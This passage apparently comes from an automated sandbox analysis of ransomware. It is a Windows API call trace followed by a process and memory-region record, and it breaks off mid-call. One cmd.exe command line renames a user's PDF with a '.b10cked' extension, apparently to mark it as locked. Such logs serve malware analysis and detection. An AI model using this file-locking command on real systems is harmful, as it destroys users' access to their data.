[0142.239] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] GetFileType (hFile=0x4c) returned 0x1 [0142.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.239] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.239] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] GetFileType (hFile=0x4c) returned 0x1 [0142.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] GetFileType (hFile=0x4c) returned 0x1 [0142.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] GetFileType (hFile=0x4c) returned 0x1 [0142.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 
[0142.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] GetFileType (hFile=0x4c) returned 0x1 [0142.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.240] GetFileType (hFile=0x4c) returned 0x1 [0142.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.240] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.240] GetFileType (hFile=0x4c) returned 0x1 [0142.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.240] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.240] GetFileType (hFile=0x4c) returned 0x1 [0142.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.240] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.240] GetFileType (hFile=0x4c) returned 0x1 [0142.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.240] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.240] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0142.240] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.240] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.240] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.240] GetFileType (hFile=0x4c) returned 0x1 [0142.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.241] GetFileType (hFile=0x4c) returned 0x1 [0142.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.241] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.241] GetFileType (hFile=0x4c) returned 0x1 [0142.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.241] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.241] GetFileType (hFile=0x4c) returned 0x1 [0142.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.241] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.241] GetFileType (hFile=0x4c) returned 0x1 [0142.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.241] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.241] GetFileType (hFile=0x4c) returned 0x1 [0142.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.241] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.242] GetFileType (hFile=0x4c) returned 0x1 [0142.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.242] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.242] GetFileType (hFile=0x4c) returned 0x1 [0142.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.242] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.242] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.242] GetFileType (hFile=0x4c) returned 0x1 [0142.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.242] GetFileType 
(hFile=0x4c) returned 0x1 [0142.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.242] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.242] GetFileType (hFile=0x4c) returned 0x1 [0142.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.242] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.242] GetFileType (hFile=0x4c) returned 0x1 [0142.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.243] GetFileType (hFile=0x4c) returned 0x1 [0142.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.243] GetFileType (hFile=0x4c) returned 0x1 [0142.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.243] GetFileType (hFile=0x4c) returned 0x1 [0142.243] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0142.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.243] GetFileType (hFile=0x4c) returned 0x1 [0142.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.243] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.243] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.243] GetFileType (hFile=0x4c) returned 0x1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] GetFileType (hFile=0x4c) returned 0x1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] GetFileType (hFile=0x4c) returned 0x1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, 
lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] GetFileType (hFile=0x4c) returned 0x1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] GetFileType (hFile=0x4c) returned 0x1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] GetFileType (hFile=0x4c) returned 0x1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] GetFileType (hFile=0x4c) returned 0x1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.245] GetFileType (hFile=0x4c) returned 0x1 [0142.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.245] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, 
lpOverlapped=0x0) returned 1 [0142.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.245] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x32, lpOverlapped=0x0) returned 1 [0142.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.245] GetFileType (hFile=0x4c) returned 0x1 [0142.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.245] GetFileType (hFile=0x4c) returned 0x1 [0142.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.245] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x32, lpOverlapped=0x0) returned 1 [0142.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.245] _close (_FileHandle=4) returned 0 [0142.245] FindNextFileW (in: hFindFile=0x350e90, lpFindFileData=0x26ef34 | out: lpFindFileData=0x26ef34) returned 0 [0142.246] GetLastError () returned 0x12 [0142.246] FindClose (in: hFindFile=0x350e90 | out: hFindFile=0x350e90) returned 1 [0142.246] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0142.247] _close (_FileHandle=3) returned 0 [0142.247] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.247] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.247] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.247] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.248] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.248] GetConsoleMode (in: 
hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.248] SetConsoleInputExeNameW () returned 0x1 [0142.248] GetConsoleOutputCP () returned 0x1b5 [0142.248] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.248] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.248] exit (_Code=0) Process: id = "173" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d00" os_pid = "0xdd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14998 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14999 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 15000 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 15001 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 15002 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = 
"cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 15003 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 15004 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 15005 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 15006 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 15007 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16022 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16023 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16024 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16025 start_va = 0x4b0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 16026 start_va = 0x7a0000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 16027 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = 
"\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16028 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16029 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16030 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16031 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16032 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16033 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16034 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16035 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16036 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" 
Region: id = 16037 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16038 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16039 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 16040 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 16041 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 16042 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 16043 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 16044 start_va = 0x5b0000 end_va = 0x712fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 16045 start_va = 0x7b0000 end_va = 0x13affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Thread: id = 230 os_tid = 0xf78 [0141.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efa2c | out: lpSystemTimeAsFileTime=0x2efa2c*(dwLowDateTime=0x8e5a99e0, dwHighDateTime=0x1d440a9)) [0141.641] GetCurrentProcessId () returned 0xdd4 [0141.641] GetCurrentThreadId () returned 0xf78 [0141.641] GetTickCount () returned 0x2c62b [0141.641] QueryPerformanceCounter (in: lpPerformanceCount=0x2efa24 | out: lpPerformanceCount=0x2efa24*=19842986481) returned 1 [0141.642] 
GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.642] __set_app_type (_Type=0x1) [0141.642] __p__fmode () returned 0x76b331f4 [0141.642] __p__commode () returned 0x76b331fc [0141.642] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.642] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.642] GetCurrentThreadId () returned 0xf78 [0141.642] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf78) returned 0x38 [0141.642] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.642] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.642] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.643] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.643] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef9bc | out: phkResult=0x2ef9bc*=0x0) returned 0x2 [0141.643] VirtualQuery (in: lpAddress=0x2ef9f3, lpBuffer=0x2ef98c, dwLength=0x1c | out: lpBuffer=0x2ef98c*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.643] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef98c, dwLength=0x1c | out: lpBuffer=0x2ef98c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.643] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef98c, dwLength=0x1c | out: lpBuffer=0x2ef98c*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, 